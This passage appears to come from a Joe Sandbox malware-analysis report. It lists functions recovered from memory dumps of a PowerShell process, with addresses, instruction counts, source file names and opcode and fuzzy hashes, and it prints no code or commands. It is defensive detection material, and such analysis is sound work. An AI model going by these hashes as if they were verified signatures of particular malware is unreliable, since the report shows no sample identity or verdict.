                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b95806c3c9736db99ed78471525ad5d1fb36e6612b9530c1f8e3c170bd9d1698
                                                              • Instruction ID: 26ea112b2a22702e69a8bbfc8417f2b1e52c415550bcb7904dca16264355c84e
                                                              • Opcode Fuzzy Hash: b95806c3c9736db99ed78471525ad5d1fb36e6612b9530c1f8e3c170bd9d1698
                                                              • Instruction Fuzzy Hash: B0918A75A00205CFCB15CF59C594AAEFBB1FF88310B2485A9D916AB3A5C735FC91CBA0
                                                              Function 04A6BAB0 Relevance: .2, Instructions: 156COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: abfe00ab751f4b363719916fc4a8e06193109a2e3c8c036a8c057e791d7e75a2
                                                              • Instruction ID: 3860b6c68dd0cd5343104635cbc968c0fcf764e5c1a853b49dc8f274afa2291b
                                                              • Opcode Fuzzy Hash: abfe00ab751f4b363719916fc4a8e06193109a2e3c8c036a8c057e791d7e75a2
                                                              • Instruction Fuzzy Hash: 74614675E012489FCB04DFA9D584A9DBFF5FF88310F14806AE819EB365EB34A945CB60
                                                              Function 04A6BAC0 Relevance: .2, Instructions: 155COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4603ba27f0ed5bbcb9bb593644af5b0615568bca6ab5812759ae0f0b9f3f87b8
                                                              • Instruction ID: ec641c3c160837a953e6f4b2872e41dc5853419cec7ed4ae2e1012bbbc3be259
                                                              • Opcode Fuzzy Hash: 4603ba27f0ed5bbcb9bb593644af5b0615568bca6ab5812759ae0f0b9f3f87b8
                                                              • Instruction Fuzzy Hash: 7A611571E012589FCB14DFA9D584A9DFBF5FF88310F14812AE819EB264EB34AD45CB60
                                                              Function 04A67728 Relevance: .2, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bdd49a07779a6fdc60ab85825665303582c6da2bed53120887e17eb6cd29a6ec
                                                              • Instruction ID: 588cf1f1178b00042104f5b4d8d1623b3ead5ba36e530ad9dc0f3e7e07b7aa2e
                                                              • Opcode Fuzzy Hash: bdd49a07779a6fdc60ab85825665303582c6da2bed53120887e17eb6cd29a6ec
                                                              • Instruction Fuzzy Hash: EA51BE797102058FD705CB69D844A6A7BEAFFC8358F1484B9E50ACB352EB35EC01CBA0
                                                              Function 077D3CCD Relevance: .1, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2221081524.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_77d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76b1f4343a283c4f6b2fdc57b69e988500171a0fcf7820cd03403b4d90127c15
                                                              • Instruction ID: 0aa6bdf32af5b691602e91802091f6fe11c5c446ddcb1459dcefe7f011573f13
                                                              • Opcode Fuzzy Hash: 76b1f4343a283c4f6b2fdc57b69e988500171a0fcf7820cd03403b4d90127c15
                                                              • Instruction Fuzzy Hash: EA4139F1A10206DFCB218F24C951B7BFFB29F85680F1488A9D8009F291D735DC65CBA2
                                                              Function 04A62B00 Relevance: .1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 16968818c3d5c08506e2c2e78059d86cee316d7a6ca77f522d82dee7f7ab6353
                                                              • Instruction ID: b901e834e1bf9e0e7e83531518e1ee3d0ec534979ae7b19bbd8c21726ffdbd0d
                                                              • Opcode Fuzzy Hash: 16968818c3d5c08506e2c2e78059d86cee316d7a6ca77f522d82dee7f7ab6353
                                                              • Instruction Fuzzy Hash: 55413775A00505CFCB05CF59C598AAEFBB1FF48311B1585A9D916AB364C732FC91CBA0
                                                              Function 04A6C388 Relevance: .1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f01d4220d7b15796b0fefed2be9056bbdb416985d0b6eeea098cd0a47c1be7a8
                                                              • Instruction ID: 02ecb5de60e8b24cd47448dc03f0a51db9998e5c8fda42aee547ca1411ad69b4
                                                              • Opcode Fuzzy Hash: f01d4220d7b15796b0fefed2be9056bbdb416985d0b6eeea098cd0a47c1be7a8
                                                              • Instruction Fuzzy Hash: F5315C353016019FD709EB78F854F9AB7AAEFC4215F048239D60ACB365DB75A809CBA1
                                                              Function 04A66FA0 Relevance: .1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7911cceb654a3faf9cef8c844f4ef1df040caa8710faa770dd36c4ed0a188850
                                                              • Instruction ID: bd284966e718c9134d99a5037b01356a4374ede9d84cd7c77316c2b8618dcca9
                                                              • Opcode Fuzzy Hash: 7911cceb654a3faf9cef8c844f4ef1df040caa8710faa770dd36c4ed0a188850
                                                              • Instruction Fuzzy Hash: DA314D38A142458FDB05CFA4C964AAABBF1EF8D314F158098D946EB3A1DB35EC01CF60
                                                              Function 04A6AE60 Relevance: .1, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bccece420fdb2c2a8fe3aed50f1929957cdfbf0350742a0c940dec0b06c14d71
                                                              • Instruction ID: 545d13ffdcb7db88849f809ac9dac8fd36617a382fb6d394ed3fbe4cdaf770f9
                                                              • Opcode Fuzzy Hash: bccece420fdb2c2a8fe3aed50f1929957cdfbf0350742a0c940dec0b06c14d71
                                                              • Instruction Fuzzy Hash: 23317E70E012098FDB04DFB9D594AAEBBF6EF89310F14802DE406EB364EB349C468B51
                                                              Function 04A6AD28 Relevance: .1, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b75531f1908d7cf6f11ab7307917e4200ef226e7d74c36ca099f6e0430ab817b
                                                              • Instruction ID: 2ed32a3d9f1b494b11f52e43f5b18bcc8824e486c9c48351a4eccea68cde0249
                                                              • Opcode Fuzzy Hash: b75531f1908d7cf6f11ab7307917e4200ef226e7d74c36ca099f6e0430ab817b
                                                              • Instruction Fuzzy Hash: 3C3190B8A012459FDB01DFA8E454AFF7BB6EFC5300F1184A9D111AF3A5CA34AD45CB60
                                                              Function 04A6AE70 Relevance: .1, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8d5ddef7dbc8f26eebaf2a3de8e20bce436c3c479dfdc0dcfa1769441a5e6c95
                                                              • Instruction ID: 265c3f26088d754bec45b9cade60bae4b4539154154202e6ba8ec6409f282676
                                                              • Opcode Fuzzy Hash: 8d5ddef7dbc8f26eebaf2a3de8e20bce436c3c479dfdc0dcfa1769441a5e6c95
                                                              • Instruction Fuzzy Hash: AB315C70A016099FDB08DFA9D5947AEBBF6EF89310F108029E406EB394EB349C058B65
                                                              Function 04A6DFC0 Relevance: .1, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 336bd2cb194d4444b8125191f45ce7ee8a59125c20442b957ef5246ad0471574
                                                              • Instruction ID: 53e3355ca1e66d4c0c0fbf1c6173f1c3faf13cb7ad2db5f129a3cc1b37164f97
                                                              • Opcode Fuzzy Hash: 336bd2cb194d4444b8125191f45ce7ee8a59125c20442b957ef5246ad0471574
                                                              • Instruction Fuzzy Hash: 52316D74A016048FCB14DFA9E468AAEBBF2FF88224F14456ED406EB391DF34AC41CB50
                                                              Function 04A6AD38 Relevance: .1, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 470739fa6a5b44d7ec5cab280a8ac76a14da88757fa825eb0349f15e07ff7967
                                                              • Instruction ID: 4e259159bea42987ed33f691edbb55675ae560e9e8a09ed9165faf38338331a9
                                                              • Opcode Fuzzy Hash: 470739fa6a5b44d7ec5cab280a8ac76a14da88757fa825eb0349f15e07ff7967
                                                              • Instruction Fuzzy Hash: 303121B8A006099FDB04EFA8E554AFF77B6EFC4300F118469D515AB394DB35ED418B90
                                                              Function 04A6DFD0 Relevance: .1, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a79d05d1809e17b0b0126f4196048a3a82a0e41ad2bb8fde059a3492a05d3cf2
                                                              • Instruction ID: ec7bc2f0c117285181bf2d8308b2372eb7abaad060938c85b01acd1c84843931
                                                              • Opcode Fuzzy Hash: a79d05d1809e17b0b0126f4196048a3a82a0e41ad2bb8fde059a3492a05d3cf2
                                                              • Instruction Fuzzy Hash: 55314974A012048FDB14EF69E458AAEBBF2FF88324F048569D406EB390DF75AC45CB90
                                                              Function 030AF3D8 Relevance: .1, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2185671549.00000000030AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_30ad000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 43fe812c28c8e0c9a857dd18b07f4c07844bb0ddfcb05ff6557e4d582a6a346c
                                                              • Instruction ID: a640a4cf22e622f628f38ce34898f312d3fa7e0d93cfe1192812b3195af9a048
                                                              • Opcode Fuzzy Hash: 43fe812c28c8e0c9a857dd18b07f4c07844bb0ddfcb05ff6557e4d582a6a346c
                                                              • Instruction Fuzzy Hash: 2C21F771504601DFCB05DF98E9C0B16BFA5FB88314F24C9A9E9094F656C33AD456CBA1
                                                              Function 04A693F0 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c771c9c2b78d501b9463f71fa6237323377519ef13d897d5b81976c813941516
                                                              • Instruction ID: 98e6cef90a1f602c179ae731aeb9464c0b78a4bc203ba86dfde023ccb30872f3
                                                              • Opcode Fuzzy Hash: c771c9c2b78d501b9463f71fa6237323377519ef13d897d5b81976c813941516
                                                              • Instruction Fuzzy Hash: DE318DB09057848EDB60CF6AD4883CAFFF6EF89320F28845EC85E97245D674A445CB61
                                                              Function 030AF02C Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2185671549.00000000030AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_30ad000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 58d75b48edb6f57d444100686494d5adfef45af9e219d85c88f2a39e43043e7f
                                                              • Instruction ID: b1402eadde81413ef440bd564ad3c0c277973672103d2a783d5a98d5559513f1
                                                              • Opcode Fuzzy Hash: 58d75b48edb6f57d444100686494d5adfef45af9e219d85c88f2a39e43043e7f
                                                              • Instruction Fuzzy Hash: CA212271505601DFCB14DFA8E9C0F26BFA9EB88314F24C9A9D9094B256C33AD446DA61
                                                              Function 030AF4CC Relevance: .1, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2185671549.00000000030AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_30ad000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2ee5029870e68f62c5834c408869d52ea516393c792ee9583f8104414d5b3c7e
                                                              • Instruction ID: afb7bbe34cc7aef671be989fdf977f41080ce6516d21d2de1e0529b095a900c2
                                                              • Opcode Fuzzy Hash: 2ee5029870e68f62c5834c408869d52ea516393c792ee9583f8104414d5b3c7e
                                                              • Instruction Fuzzy Hash: FC215BB15056419FC714DF7CE9C0B26BBA9FB84314F24C9ADDA094B341C33AD446C6A1
                                                              Function 04A69400 Relevance: .1, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 96e52808df51eb3db8584215ef194e423f4b8fc5f1ac3979c953cc9a021010b4
                                                              • Instruction ID: 79bd429bc719425c6b676c3cce91a7c34ba7ab1370b2da9ce3ab0314be91cdd8
                                                              • Opcode Fuzzy Hash: 96e52808df51eb3db8584215ef194e423f4b8fc5f1ac3979c953cc9a021010b4
                                                              • Instruction Fuzzy Hash: 32215CB49017448EDB60CF6AD48839AFFF6EF89320F28C41ED85E97245D6746485CB61
                                                              Function 04A67664 Relevance: .1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: faaccbc240aabed45c205544a29f549e64cf0e45a69ef81fc50e5645bec1ac62
                                                              • Instruction ID: 83b6aa9154dcf4c41f4e0a3c4363dc007180c789cb1539b74c77376d1049e4a7
                                                              • Opcode Fuzzy Hash: faaccbc240aabed45c205544a29f549e64cf0e45a69ef81fc50e5645bec1ac62
                                                              • Instruction Fuzzy Hash: 15112E39B001188FCB04DFACE9409DDB7F6EFC8215B0540A5E90ADB365DB34EC068BA0
                                                              Function 04A62C5C Relevance: .1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 533a515dcd014606bd67dcc2b764197392d8a932cc66eeddcfe8b9596dbfe043
                                                              • Instruction ID: 9ddab90e8f370cd28a6ba53d1df2e86e6ad82eea21744ff1caa2d6278562a64c
                                                              • Opcode Fuzzy Hash: 533a515dcd014606bd67dcc2b764197392d8a932cc66eeddcfe8b9596dbfe043
                                                              • Instruction Fuzzy Hash: 8721B4359042418FCB12DF6CD8A47E9BBB0EF4A324F1445E6D4559B2A2C736AC52CB60
                                                              Function 030AF3D3 Relevance: .1, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2185671549.00000000030AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_30ad000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                                              • Instruction ID: 35d5ac04b0445e7af25303120b57bba061107f37100fe53ff41651911eb8c677
                                                              • Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                                              • Instruction Fuzzy Hash: E321FD76504640DFCF06CF54D9C0B12BFB2FB88314F28C5A9D9080B656C33AC46ACBA1
                                                              Function 04A6C343 Relevance: .1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f14672dfa4f17977566733f18774bad08202039231917d063b7ce343f6d59f85
                                                              • Instruction ID: 88b1cc2293a8c7f5f04b6d6881b378c5ac93e134e1b820ce429c574ca244cf24
                                                              • Opcode Fuzzy Hash: f14672dfa4f17977566733f18774bad08202039231917d063b7ce343f6d59f85
                                                              • Instruction Fuzzy Hash: 76011B2220E3D15FD3179778A9646967FB5AF43215F0A40EBC5C5CF1A3D9158849C361
                                                              Function 030AF027 Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2185671549.00000000030AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_30ad000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                                                              • Instruction ID: e103a8d8d0f895347c6798f9225ac92c3696df6b94268c28376d867363089700
                                                              • Opcode Fuzzy Hash: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                                                              • Instruction Fuzzy Hash: E511DD75505680CFCB12CF58E9C4B15FFB1FB84328F28C6AAD8494B656C33AD44ADB62
                                                              Function 04A6BCE0 Relevance: .1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a7009cc9c35e55aead532ff791ab5b5e2dd1730b2e8645de38ff5cac8218ec99
                                                              • Instruction ID: 9d655cef710baebec54d5217768236528498706903a39eb6b5700139d9ffbdd1
                                                              • Opcode Fuzzy Hash: a7009cc9c35e55aead532ff791ab5b5e2dd1730b2e8645de38ff5cac8218ec99
                                                              • Instruction Fuzzy Hash: 6001D2312087849FC715CB79D998A9A7FF4AF46210F1848EED08ECB6A2DA21F884C711
                                                              Function 030AF4C7 Relevance: .0, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2185671549.00000000030AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_30ad000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1e04e90d634e2f936e694f76980dc6fbe978928d934a7debcaa3b663106d0730
                                                              • Instruction ID: 4e775a4b0f8fe4af020c56e4e0b7c0b4480c2a4e73f5671011340acc5afb95f2
                                                              • Opcode Fuzzy Hash: 1e04e90d634e2f936e694f76980dc6fbe978928d934a7debcaa3b663106d0730
                                                              • Instruction Fuzzy Hash: BC112071504680CFCB11CF28E9C4B25FBB1FB48314F28C6ADC9498B642C33AD44ACB92
                                                              Function 04A6E2A0 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 68e81016f8a1ec0d1fedfc81dbcd970573ee7420e8b71811322bc5b628cfcba0
                                                              • Instruction ID: def57a226b68619eb8362e2011a14c1eff479cd3aff8c580c60ece5b26b1bd7f
                                                              • Opcode Fuzzy Hash: 68e81016f8a1ec0d1fedfc81dbcd970573ee7420e8b71811322bc5b628cfcba0
                                                              • Instruction Fuzzy Hash: 681105742047508FC728DF79D09086ABBF6EF8931536489ADD48A8B7A0DB36F845CF50
                                                              Function 04A6DE98 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c273d3d13e9b12bde709bc4e3e5ebd5e4e286c658745fe931c61679d1bd934e1
                                                              • Instruction ID: 23421e70deba5be71abc5f26c08f15274f90b4b017febe4b6a8ef9a6f493acab
                                                              • Opcode Fuzzy Hash: c273d3d13e9b12bde709bc4e3e5ebd5e4e286c658745fe931c61679d1bd934e1
                                                              • Instruction Fuzzy Hash: 3C018C36B01214CFCB119B74F808AAEBBF6FB88215B00806DE50AD3242DB32A915CB90
                                                              Function 030AD006 Relevance: .0, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2185671549.00000000030AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_30ad000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 63e0daa4b7ee4e7488ccbd6dc045f4ad186ac1f323a5dfb464da99a4d2007c6f
                                                              • Instruction ID: f9963880556159294f54c27d7c287c3b3261e61de7082a1b448f6d55fd89d20c
                                                              • Opcode Fuzzy Hash: 63e0daa4b7ee4e7488ccbd6dc045f4ad186ac1f323a5dfb464da99a4d2007c6f
                                                              • Instruction Fuzzy Hash: 1F016D7140E3C09ED7528B299C94B52BFA8EF53220F0D84DBE9888F597C2685845D772
                                                              Function 04A6BF10 Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f616272405905192c9c7f08d26313fedeb97a736d08f58302cd963f974787262
                                                              • Instruction ID: 20ff2f21029ba2a0f1f936ce109ad6d32fb4c1492af5d2bd2120ade4b35047a3
                                                              • Opcode Fuzzy Hash: f616272405905192c9c7f08d26313fedeb97a736d08f58302cd963f974787262
                                                              • Instruction Fuzzy Hash: 670181313093A01FD7128ABA9C509A77FE9DF86621B1944ABF584CB2A2CA71CC04C771
                                                              Function 030AD01D Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2185671549.00000000030AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_30ad000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7ce3d9958874d9e4cb478054a89416254c68ca440c5983b8ac84b7c4ddb40efa
                                                              • Instruction ID: e5861c536bbf3225312d26b2ab56a98ba0ce04f847ecd2e3012d2a8665906c64
                                                              • Opcode Fuzzy Hash: 7ce3d9958874d9e4cb478054a89416254c68ca440c5983b8ac84b7c4ddb40efa
                                                              • Instruction Fuzzy Hash: 5801F771406B449AD760CA6DDD84F6BFFDCEF45320F1CC46AED480A646C2799841D6B1
                                                              Function 04A6C4C0 Relevance: .0, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8647e58a54f7f870948475ff46206d53057fe89207b87b011b32ce6282b60578
                                                              • Instruction ID: 6b211f3a509f8f6010c380e8e820fea564e185a3d6af2ebc5fe80bd5f0493dbf
                                                              • Opcode Fuzzy Hash: 8647e58a54f7f870948475ff46206d53057fe89207b87b011b32ce6282b60578
                                                              • Instruction Fuzzy Hash: 19F0C8351057406FC3059768F9608AB7B95EFC22157148ABFD149CF622CA26AC09C7B0
                                                              Function 04A67940 Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
